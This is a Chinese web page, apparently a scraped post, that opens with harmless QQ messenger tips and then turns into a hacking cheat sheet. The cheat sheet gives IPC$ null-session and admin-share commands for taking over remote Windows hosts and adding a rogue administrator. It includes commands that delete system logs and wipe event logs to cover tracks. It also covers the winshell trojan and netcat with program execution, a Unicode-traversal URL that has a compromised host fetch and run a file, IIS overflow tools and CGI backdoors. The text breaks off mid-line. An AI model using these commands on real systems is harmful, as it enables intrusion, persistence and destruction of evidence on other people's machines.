1。号码被盗后，如何恢复以前的好友名单：
以前的号码假设为AA，申请一个新的QQ号码，假设BB号。打开QQ目录，在以AA号码命名的文件夹中找到 user.db文件,然后覆盖粘贴至BB号码所在的文件夹中(复制前先备份此文件);使用BB号码登陆,所有AA以前的 好友都在好友列表里面了,但是显示离线状态,把好友拖至陌生人组(按住shift全选名单或者ctrl+a),然后再在陌生人组里,把好友再拖进好友组中,退出,登陆后就会发现以前的好友又回来了.
2.如何让QQ昵称和自动回复与众不同.
在昵称和自动回复中添加QQ支持的表情图标快捷键即可打造个性昵称和回复消息.如加入太阳的表情图标,即可写入\"/ty\",这些表情图标所对应的快捷键可单击QQ聊天窗口的表情下拉框,在每个图标上用鼠标停留一会即可显示对应的快捷键文字.
3.强制聊天
如出于特殊原因，必须向一个非好友的QQ用户发送消息时，可用一段强制聊天代码实现，在浏览器中输入以下这段代码：HTTP：//WPA.QQ.COM/MSGRD?V=1&UIN=******&SITE=IOSHENMUE&MENU=YES,随后将代码中的星号换成需联系用户的QQ号码并在浏览器中打开该地址即可.这样无论对方是否为QQ好友,均可直接发送消息.执行上述操作时最好开一个QQ号.如果开两个以上的QQ,则会出现对话框让用户选择使用QQ号码与对方聊天.
4.隐藏摄像头.
如果安了摄象头又不想让系统自动出现,可以隐藏摄象头,进入\"个人设置-系统设置-本地安全\"选项卡,在\"状态显示\"中,勾选\"不要将我列在在线视频用户的列表中\"一项即可.同样,勾选\"游戏状态不可见\"和\"聊天室状态不可见\"两项,就可隐藏自己的游戏和聊天室里的活动行踪.
5.禁止上线自动提示.
单击QQ面板的\"菜单\"的\"个人设置\"子菜单的\"系统设置\",单击\"基本设置\",将状态显示栏中的\"禁止所有用户上线提示\",点击确定即可.
6.从对方好友名单中消失.
如果要将自己从对方的好友名单中消失,但又需要对方保留在自己的好友名单中,要求对方删除自己的想法绝对不妥,但可借助QQ商务版本TM来实现神秘\"蒸发\",直接用TM登陆,在好友列表中找到对方,在其头像上单击右键, 选择\"将自己从对方联系人名单中删除\",最后在随后出现的警告对话框中进行确定即可,再登陆QQ,就行了.
7.揪出隐身好友.
隐身是QQ一项独特功能,虽然灰暗的图标免受了不少打拢,可用户仍有几种方法可找出隐身好友,下面只介绍一种:发送一个语音视频聊天请求,或发送某个文件给好友,如对方确实在线的话,会有以下几种处理方式,A:\"接 收\"或\"拒绝\".此时窗口中会弹出相应的提示,即可确定对方处于隐身状态.B:直接关闭.对方即不接受也不拒绝, 而直接将弹出窗口关闭,那么窗口同样会有对方拒绝的提示,同样可确定对方隐身.C:最小化弹出窗口,此时窗口无任何提示,无法确定对方隐身状态,但该方式下,对方的QQ会一直开着邀请窗口并占用资源.D:直接下线.对方不关闭弹出窗口而直接下线,此后再关闭弹出窗口,由于已下线,因此任何举动不会被传送,随后再隐身上线即可,这是对付试探隐身的最好办法
8.自动找出不聊天好友.(没用的)
目前的QQ版本允许添加500个好友,当人满为患的时候即需删除一些好友,而删除的衡量标准往往是添加后几乎没有聊天的好友,其实使用一个简单的批处理命令即可迅速查出哪些好友没有聊天,随后可将其逐个删除.先将QQ的聊天记录导出为myinfo.txt文件,随后编写一个批处理文件,内容如下 :findstr\"消息对象为:\"myinfo.txt>myfr.txt 然后将该批处理文件和myinfo.txt放在同一目录中,运行该批处理文件.此生会生成一个myfr.txt文件,文件中包含所有聊天的好友列表,随后只需通过查找方式来对照列表,将没有聊天的好友删除即可.
9,在QQ中看网络电视.
这属于QQ的隐藏功能，登陆QQ（2005beta3），单击QQ侧边栏的“用户自定义面板”。然后，单击“收藏夹”中的“设置”选项，弹出一个收藏列表框，可看到“Q_Radio”选项，勾选该选项就可以进行网络收音机。随后，添加一个“Q_TV”，链接地址输入“”，并勾选即可。
10.巧护聊天记录.
QQ的聊天记录也是一种不亚于密码的绝对隐私，保护聊天记录等本地信息，可以通过设置本地消息口令来实现。首先在QQ界面上选择“系统参数”，在“系统参数”视察选择“安全设置”标签，随后选择“启用本地消息加密”，再依次输入口令并确认口令即可。此外，为保险起见，建议勾选“启用本地消息加密口令提示”,设定提示问题和问题答案，按下“确定”使设定生效。此后在启动QQ输入账号和密码后，软件还会要求输入本地消息口令，否则无法登陆。
11.快速定位好友.
目前不少网友的QQ列表中有上百个好友，如何从长串列表中快速找到某个好友呢？很简单，在好友列表中，按下好友昵称的首字母即可快速定位，如“alan”的首个字母是“a”，“猛张飞”的拼音是“meng”，首个字母就是“M”，直接就能快速找到了。
12 改变地理位置
目前不少QQ版本（如珊瑚虫版）都有显示IP和地理位置的功能，很容易暴露网友的隐私。不过只需使用代理服务器，即可改变自己的地理位置。首先搜索到可用的代理服务器地址，在QQ中选择“个人设置-系统设置-代理设置”选项，选择“使用自定义的网络设置”，类型按代理服务器属性进行设置，如代理服务器属性为“sock5”，那么选择“sock5代理服务器”，在服务器一栏中并填入IP地址端口、用户名和密码等信息
即可。
13 安全防范
在公共场所（如网吧）使用QQ必须得小心，以防别人盗号，现在的黑客、木马太多了。不过也有几条妙计可帮 助你较好的实现安全防范：
A：号码加“0” 在QQ号码前面输入一大串“0”，然后再登录，丝毫不会影响QQ的使用（新版QQ中，0加上QQ 号码长度不可超过10个字符）
B：使用软件键盘 使用QQ提供的软键盘虽然比较麻烦，但也是一种简单的好办法。
C：乱序输入 如QQ的密码是“123456”，输入时先打1356，接着将鼠标单击到1后面输入2，再将鼠标移到3后 输入4即可，该方法主要对付专门截获键盘动作的木马程序，由于截获键盘动作的木马程序无法获悉鼠标的移动，因此非常安全。

网管和黑客都必须知道的命令

（与远程主机建立空管连接） net use 地址\ipc$ "" /use："" 　　（以管理员身份登录远程主机） net use 地址\ipc$ "密码" /use："Administrator" 　　（传送文件到远程主机WINNT ...
     （与远程主机建立空管连接） net use 地址\ipc$ "" /use：""

　　（以管理员身份登录远程主机） net use 地址\ipc$ "密码" /use："Administrator"

　　（传送文件到远程主机WINNT目录下）copy 本机目录路径\程序 地址\admin$

　　（查看远程主机时间） net time 地址

　　（定时启动某个程序） at 地址 02：18 readme.exe

　　（查看共享） net view 地址

　　（查看netbios工作组列表） nbtstat -A IP地址

　　（将远程主机C盘映射为自己的F盘） net use f： 地址\c$ ""/user："Administrator"

　　（这两条把自己增加到管理员组）： net user 用户名 密码 /add

　　net localgroup Administrators 用户名 /add

　　（断开连接） net use 地址\ipc$ /delete

　　=====================================================

　　擦屁屁：

　　del C：\winnt\system32\logfiles\*.*

　　del C：\winnt\ssytem32\config\*.evt

　　del C：\winnt\system32\dtclog\*.*

　　del C：\winnt\system32\*.log

　　del C：\winnt\system32\*.txt

　　del C：\winnt\*.txt

　　del C：\winnt\*.log

　　============================

　　一、netsvc.exe

　　下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务：

　　netsvc /list 地址

　　netsvc schedule 地址 /query

　　netsvc 地址 schedule /start

　　二、OpenTelnet.exe

　　远程启动主机的Telnet服务，并绑定端口到7878，例如：

　　OpenTelnet 地址 用户名 密码 1 7878

　　然后就可以telnet到主机的7878端口，进入DOS方式下：

　　telnet IP地址 7878

　　三、winshell.exe

　　一个非常小的木马（不到6K），telnet到主机的7878端口，输入密码winshell，当看到CMD>后，可打下面的命令：

　　p Path （查看winshell主程序的路径信息）

　　b reBoot （重新启动机器）

　　d shutDown （关闭机器）

　　s Shell （执行后你就会看到可爱的“C：\>”）

　　x eXit （退出本次登录会话，此命令并不终止winshell的运行）

　　CMD> （通过http下载其他网站上的文件到运行winshell的机器上）

　　四、3389登陆器，GUI方式登录远程主机的

　　五、elsave.exe

　　事件日志清除工具

　　elsave -s 地址 -l "application" -C

　　elsave -s 地址 -l "system" -C

　　elsave -s 地址 -l "security" -C

　　执行后成功清除应用程序日志，系统日志，安全日志

　　六、hbulot.exe

　　开启win2kserver和winxp的3389服务

　　hbulot [/r]

　　使用/r表示安装完成后自动重起目标使设置生效。

　　七、nc.exe（netcat.exe）

　　一个很好的工具，一些脚本程序都要用到它，也可做溢出后的连接用。

　　想要连接到某处： nc [-options] hostname port[s] [ports] ……

　　绑定端口等待连接： nc -l -p port [-options] [hostname] [port]

　　参数：

　　-e prog 程序重定向，一旦连接，就执行 [危险！！]

　　-g gateway source-routing hop point[s]， up to 8

　　-G num source-routing pointer： 4， 8， 12， ……

　　-h 帮助信息

　　-i secs 延时的间隔

　　-l 监听模式，用于入站连接

　　-n 指定数字的IP地址，不能用hostname

　　-o file 记录16进制的传输

　　-p port 本地端口号

　　-r 任意指定本地及远程端口

　　-s addr 本地源地址

　　-u UDP模式

　　-v 详细输出——用两个-v可得到更详细的内容

　　-w secs timeout的时间

　　-z 将输入输出关掉——用于扫描时

　　八、TFTPD32.EXE

　　把自己的电脑临时变为一台FTP服务器，让肉鸡来下载文件，tftp命令要在肉鸡上执行，通常要利用Unicode漏洞或telnet到肉鸡，例如：

　　地址/s cripts/……%255c……%255c/winnt/system32/cmd.exe？/c tftp -i 本机IP地址 get 文件名 c：\winnt\system32\文件名

　　然后可以直接令文件运行：

　　地址/s cripts/……%255c……%255c/winnt/system32/cmd.exe？/c+文件名

　　九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的，选择“溢出后在一个端口监听”，然后用telnet连接它的监听端口，如果溢出成功，一连它的端口，绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出，成功以后winxp下需要打winxp.

　　一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor，exe要放到cgi-bin目录下，asp放到有ASP执行权限的目录。然后用IE浏览器连接。

　　一、一 Xscan命令行运行参数说明：

　　在检测过程中，按"[空格]"键可以查看各线程状态及扫描进度，按"q"键保存当前数据后提前退出程序，按""强行关闭程序。

　　1.命令格式： xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]

　　xscan -file <主机列表文件名> <检测项目> [其他选项]

　　其中<检测项目> 含义如下：

　　-port ： 检测常用服务的端口状态（可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表）；

　　-ftp ： 检测FTP弱口令（可通过\dat\config.ini文件设置用户名/密码字典文件）；

　　-ntpass ： 检测NT-Server弱口令（可通过\dat\config.ini文件设置用户名/密码字典文件）；

　　-cgi ： 检测CGI漏洞（可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案）；

　　-iis ： 检测IIS漏洞（可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案）；

　　[其他选项] 含义如下：

　　-v： 显示详细扫描进度

　　-p： 跳过Ping不通的主机

　　-o： 跳过没有检测到开放端口的主机

　　-t <并发线程数量[，并发主机数量]>： 指定最大并发线程数量和并发主机数量， 默认数量为100，10 1